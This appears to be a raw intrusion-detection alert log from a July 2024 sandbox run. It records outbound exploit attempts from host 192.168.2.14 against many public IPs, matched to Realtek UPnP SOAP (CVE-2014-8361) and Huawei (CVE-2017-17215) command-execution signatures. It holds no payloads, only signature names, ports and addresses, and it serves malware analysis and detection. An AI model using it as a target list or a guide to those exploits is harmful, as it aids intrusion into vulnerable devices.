                                                07/20/24-23:06:05.174834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5843852869192.168.2.14140.253.53.98
                                                07/20/24-23:05:40.347577TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25769052869192.168.2.1424.106.113.180
                                                07/20/24-23:07:11.843007TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613829252869192.168.2.14151.202.82.160
                                                07/20/24-23:06:20.738854TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5768852869192.168.2.14198.156.221.225
                                                07/20/24-23:06:40.767884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5151052869192.168.2.1488.196.89.109
                                                07/20/24-23:05:57.223056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3830452869192.168.2.14102.137.240.137
                                                07/20/24-23:05:52.572723TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25273852869192.168.2.14213.79.125.242
                                                07/20/24-23:07:01.438133TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613785052869192.168.2.14147.32.157.174
                                                07/20/24-23:06:19.491493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4849452869192.168.2.14168.176.14.101
                                                07/20/24-23:05:33.853184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617437215192.168.2.14157.58.89.166
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008237215192.168.2.14197.179.199.215
                                                07/20/24-23:06:03.311372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904037215192.168.2.1441.45.226.105
                                                07/20/24-23:05:37.440249TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25817652869192.168.2.14148.2.12.125
                                                07/20/24-23:06:01.813487TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3969252869192.168.2.14164.251.213.254
                                                07/20/24-23:06:02.449959TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614578652869192.168.2.14112.166.149.158
                                                07/20/24-23:06:00.147952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4475852869192.168.2.14221.15.178.178
                                                07/20/24-23:05:37.497829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4171852869192.168.2.1427.21.93.45
                                                07/20/24-23:05:58.369730TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4833052869192.168.2.14139.9.84.177
                                                07/20/24-23:06:38.067768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24953852869192.168.2.14212.173.5.107
                                                07/20/24-23:05:42.238265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5511637215192.168.2.14197.6.163.201
                                                07/20/24-23:06:20.610603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4960652869192.168.2.1470.112.34.196
                                                07/20/24-23:06:03.480553TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25613652869192.168.2.14163.106.60.149
                                                07/20/24-23:06:15.148043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6069852869192.168.2.14145.81.7.113
                                                07/20/24-23:05:40.407056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23545052869192.168.2.1412.103.8.219
                                                07/20/24-23:07:06.736138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737837215192.168.2.14133.187.150.141
                                                07/20/24-23:05:39.582127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6074652869192.168.2.14168.96.116.176
                                                07/20/24-23:05:58.004179TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613384652869192.168.2.14201.21.236.203
                                                07/20/24-23:05:52.483885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3587452869192.168.2.14141.254.197.56
                                                07/20/24-23:06:15.893376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5507252869192.168.2.1414.251.169.202
                                                07/20/24-23:05:47.724263TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613823852869192.168.2.14189.133.191.207
                                                07/20/24-23:05:34.657263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5312037215192.168.2.1441.14.60.190
                                                07/20/24-23:05:47.420799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4860652869192.168.2.1462.154.246.173
                                                07/20/24-23:06:32.091191TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615428452869192.168.2.14167.161.102.62
                                                07/20/24-23:06:18.420371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615875452869192.168.2.14111.50.3.252
                                                07/20/24-23:06:05.799314TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613379652869192.168.2.1493.234.150.111
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891437215192.168.2.1441.23.19.224
                                                07/20/24-23:05:56.994750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615544252869192.168.2.1432.221.18.235
                                                07/20/24-23:05:36.279109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5306052869192.168.2.14134.144.46.130
                                                07/20/24-23:05:58.818180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613770452869192.168.2.14119.34.14.186
                                                07/20/24-23:06:01.278505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615029652869192.168.2.1413.136.43.134
                                                07/20/24-23:05:59.345950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021452869192.168.2.144.205.10.72
                                                07/20/24-23:06:00.198211TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613851852869192.168.2.14197.21.16.30
                                                07/20/24-23:05:57.001261TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615299252869192.168.2.14213.67.142.255
                                                07/20/24-23:05:57.153869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3780252869192.168.2.1417.219.48.33
                                                07/20/24-23:05:52.486069TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4038452869192.168.2.14107.0.137.66
                                                07/20/24-23:05:52.701555TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24396052869192.168.2.14110.239.167.97
                                                07/20/24-23:05:33.861759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943037215192.168.2.14197.135.151.92
                                                07/20/24-23:05:40.348098TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24547252869192.168.2.1484.235.146.124
                                                07/20/24-23:05:52.535101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23327652869192.168.2.1479.31.170.172
                                                07/20/24-23:05:57.500342TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4352852869192.168.2.14109.75.221.193
                                                07/20/24-23:05:38.939890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392037215192.168.2.14197.134.96.74
                                                07/20/24-23:05:47.518986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5713452869192.168.2.14222.40.126.158
                                                07/20/24-23:05:56.915956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4022252869192.168.2.14183.154.100.223
                                                07/20/24-23:06:32.739089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413452869192.168.2.14204.191.187.136
                                                07/20/24-23:05:52.507640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3530852869192.168.2.1432.146.109.53
                                                07/20/24-23:06:01.208471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614409852869192.168.2.1489.143.75.194
                                                07/20/24-23:05:57.606471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4755452869192.168.2.1497.49.247.112
                                                07/20/24-23:05:59.046185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23934252869192.168.2.1412.176.0.4
                                                07/20/24-23:06:08.489738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615172252869192.168.2.1486.48.13.14
                                                07/20/24-23:06:27.562825TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25193452869192.168.2.1481.98.194.221
                                                07/20/24-23:06:58.705456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5142052869192.168.2.14211.197.210.31
                                                07/20/24-23:05:35.339211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4268052869192.168.2.1419.45.76.169
                                                07/20/24-23:06:14.535864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4981652869192.168.2.14210.70.160.242
                                                07/20/24-23:05:34.652423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481837215192.168.2.14197.145.253.73
                                                07/20/24-23:05:59.834038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3788252869192.168.2.1418.183.102.66
                                                07/20/24-23:06:39.662031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4990652869192.168.2.14106.217.170.66
                                                07/20/24-23:05:57.550045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4020252869192.168.2.14121.138.29.115
                                                07/20/24-23:06:05.344940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5776452869192.168.2.14157.159.224.198
                                                07/20/24-23:05:36.282306TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4120052869192.168.2.14140.198.134.198
                                                07/20/24-23:05:39.039093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792237215192.168.2.14120.43.125.170
                                                07/20/24-23:05:57.558741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4403652869192.168.2.14193.17.40.179
                                                07/20/24-23:06:37.923474TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3362652869192.168.2.14109.129.31.96
                                                07/20/24-23:05:39.067591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839237215192.168.2.14157.140.244.171
                                                07/20/24-23:05:36.327720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001637215192.168.2.14176.127.129.109
                                                07/20/24-23:06:02.091054TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613542652869192.168.2.14212.217.77.133
                                                07/20/24-23:06:01.173503TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24286452869192.168.2.14129.96.14.117
                                                07/20/24-23:06:07.167348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5738452869192.168.2.1466.44.98.255
                                                07/20/24-23:05:37.440249TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25775852869192.168.2.14125.66.54.149
                                                07/20/24-23:05:40.421092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25754252869192.168.2.1447.104.234.54
                                                07/20/24-23:05:37.472705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3859052869192.168.2.14178.154.163.217
                                                07/20/24-23:05:39.319180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614168052869192.168.2.14159.171.10.238
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207237215192.168.2.14197.118.74.140
                                                07/20/24-23:05:57.861533TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614953852869192.168.2.14151.20.36.90
                                                07/20/24-23:05:58.787162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4992652869192.168.2.1494.49.228.97
                                                07/20/24-23:05:45.764775TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615126052869192.168.2.1438.95.213.57
                                                07/20/24-23:05:45.281029TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614410852869192.168.2.14184.100.90.131
                                                07/20/24-23:05:52.526129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5660452869192.168.2.1446.75.235.28
                                                07/20/24-23:05:38.147601TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5084052869192.168.2.1424.4.155.46
                                                07/20/24-23:05:57.156324TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615872652869192.168.2.1467.226.93.72
                                                07/20/24-23:05:47.371087TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614358452869192.168.2.1473.191.176.248
                                                07/20/24-23:05:46.427946TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613441052869192.168.2.14184.129.35.32
                                                07/20/24-23:05:57.919151TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3918252869192.168.2.14128.134.241.5
                                                07/20/24-23:06:35.442399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4619252869192.168.2.1485.91.231.93
                                                07/20/24-23:05:47.978388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614783452869192.168.2.1471.131.126.141
                                                07/20/24-23:05:39.035942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015837215192.168.2.14157.57.36.175
                                                07/20/24-23:05:47.107735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831637215192.168.2.14157.238.207.80
                                                07/20/24-23:05:57.549013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288652869192.168.2.14165.198.98.63
                                                07/20/24-23:05:35.372966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613758452869192.168.2.14150.186.198.246
                                                07/20/24-23:06:09.697115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3641652869192.168.2.1495.88.21.30
                                                07/20/24-23:05:58.233115TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25507852869192.168.2.14213.153.92.60
                                                07/20/24-23:06:01.139544TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24974052869192.168.2.14190.242.197.218
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440237215192.168.2.14197.198.24.196
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455437215192.168.2.148.254.253.79
                                                07/20/24-23:06:03.480553TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24743052869192.168.2.14203.77.85.241
                                                07/20/24-23:06:38.756534TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4568252869192.168.2.14133.114.52.21
                                                07/20/24-23:06:12.981585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6090852869192.168.2.14128.90.178.16
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.14197.53.191.10
                                                07/20/24-23:05:42.237871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.14157.58.249.139
                                                07/20/24-23:05:46.088778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630237215192.168.2.14197.78.40.3
                                                07/20/24-23:06:11.296188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3289252869192.168.2.1432.217.195.62
                                                07/20/24-23:06:35.384402TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23668652869192.168.2.14203.104.19.10
                                                07/20/24-23:06:03.208973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25073652869192.168.2.14179.72.247.135
                                                07/20/24-23:06:00.171719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3438252869192.168.2.1435.126.110.108
                                                07/20/24-23:05:50.571555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409637215192.168.2.14206.14.58.9
                                                07/20/24-23:05:57.947146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4429852869192.168.2.1484.85.135.93
                                                07/20/24-23:06:38.067768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298852869192.168.2.1469.183.175.186
                                                07/20/24-23:05:53.677192TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25978652869192.168.2.14222.102.111.169
                                                07/20/24-23:05:58.983376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3627852869192.168.2.14100.5.198.48
                                                07/20/24-23:05:40.331312TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23801852869192.168.2.14213.189.106.94
                                                07/20/24-23:06:07.499893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4136037215192.168.2.1441.245.124.45
                                                07/20/24-23:06:15.234952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616099452869192.168.2.14170.201.6.202
                                                07/20/24-23:05:37.449068TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25532052869192.168.2.14187.189.79.198
                                                07/20/24-23:05:37.470290TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25383652869192.168.2.14191.30.146.121
                                                07/20/24-23:05:45.392754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015237215192.168.2.1441.246.240.88
                                                07/20/24-23:05:42.145992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059637215192.168.2.14157.206.32.150
                                                07/20/24-23:06:31.001861TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615091852869192.168.2.1437.178.53.0
                                                07/20/24-23:07:06.283235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3967852869192.168.2.14216.150.218.132
                                                07/20/24-23:06:00.781631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3296252869192.168.2.1448.66.197.202
                                                07/20/24-23:06:06.112950TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615218052869192.168.2.1454.49.52.11
                                                07/20/24-23:05:46.709144TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615094652869192.168.2.1486.160.0.18
                                                07/20/24-23:06:14.553922TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614188652869192.168.2.1451.120.217.33
                                                07/20/24-23:08:31.687974TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613711652869192.168.2.14217.194.22.37
                                                07/20/24-23:05:59.972369TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25925252869192.168.2.14119.8.55.247
                                                07/20/24-23:06:01.997543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4379652869192.168.2.1453.70.52.187
                                                07/20/24-23:06:03.151260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874452869192.168.2.1482.167.88.16
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946837215192.168.2.1441.59.91.11
                                                07/20/24-23:05:56.121210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742237215192.168.2.14172.99.105.225
                                                07/20/24-23:06:13.612988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615477652869192.168.2.1448.48.212.101
                                                07/20/24-23:05:38.953643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732037215192.168.2.14109.109.253.255
                                                07/20/24-23:05:40.341196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25928052869192.168.2.14187.211.186.240
                                                07/20/24-23:05:33.860838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458637215192.168.2.14155.178.232.143
                                                07/20/24-23:05:59.171136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5769252869192.168.2.1468.208.168.253
                                                07/20/24-23:05:59.125247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615917852869192.168.2.1470.188.135.27
                                                07/20/24-23:06:19.817334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5973052869192.168.2.14184.94.246.141
                                                07/20/24-23:05:39.345907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4902052869192.168.2.14171.41.249.212
                                                07/20/24-23:05:38.143470TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4233652869192.168.2.1418.240.153.218
                                                07/20/24-23:05:37.458829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24584852869192.168.2.14157.63.164.204
                                                07/20/24-23:06:34.929510TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5056452869192.168.2.14138.239.248.75
                                                07/20/24-23:05:36.085828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616052852869192.168.2.14118.75.62.14
                                                07/20/24-23:05:58.898489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5875852869192.168.2.14222.246.191.243
                                                07/20/24-23:05:56.825307TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4669452869192.168.2.1498.81.150.61
                                                07/20/24-23:05:52.445659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3966052869192.168.2.1423.67.93.22
                                                07/20/24-23:05:50.515904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261037215192.168.2.1441.113.60.10
                                                07/20/24-23:06:56.433850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5877252869192.168.2.1423.100.51.122
                                                07/20/24-23:05:40.453690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25192852869192.168.2.14204.164.229.194
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621037215192.168.2.1441.95.137.213
                                                07/20/24-23:05:37.590968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569252869192.168.2.14107.117.108.202
                                                07/20/24-23:06:02.324702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25132252869192.168.2.14218.51.16.69
                                                07/20/24-23:06:29.161519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3307252869192.168.2.1496.169.149.57
                                                07/20/24-23:05:42.233806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747837215192.168.2.14157.161.69.81
                                                07/20/24-23:06:17.683294TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614548452869192.168.2.14113.10.3.85
                                                07/20/24-23:05:46.835672TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613888052869192.168.2.14219.239.208.112
                                                07/20/24-23:06:06.640556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5519852869192.168.2.14192.90.118.17
                                                07/20/24-23:05:40.442605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3833252869192.168.2.1462.189.116.240
                                                07/20/24-23:05:36.324297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501637215192.168.2.14197.24.185.83
                                                07/20/24-23:05:52.515632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5893852869192.168.2.1460.143.208.198
                                                07/20/24-23:05:59.404275TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615461052869192.168.2.14203.38.123.229
                                                07/20/24-23:05:39.039093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743637215192.168.2.1473.84.136.8
                                                07/20/24-23:06:21.994838TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615624852869192.168.2.1490.91.198.115
                                                07/20/24-23:05:36.329793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582837215192.168.2.14136.10.160.42
                                                07/20/24-23:06:09.714968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614252869192.168.2.1466.198.124.244
                                                07/20/24-23:05:57.822070TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25779052869192.168.2.1437.27.29.149
                                                07/20/24-23:06:01.318185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5508852869192.168.2.14137.7.11.114
                                                07/20/24-23:05:34.622609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630237215192.168.2.14198.45.18.250
                                                07/20/24-23:06:06.076249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5955652869192.168.2.1438.86.172.217
                                                07/20/24-23:05:52.692606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25601652869192.168.2.14160.215.105.255
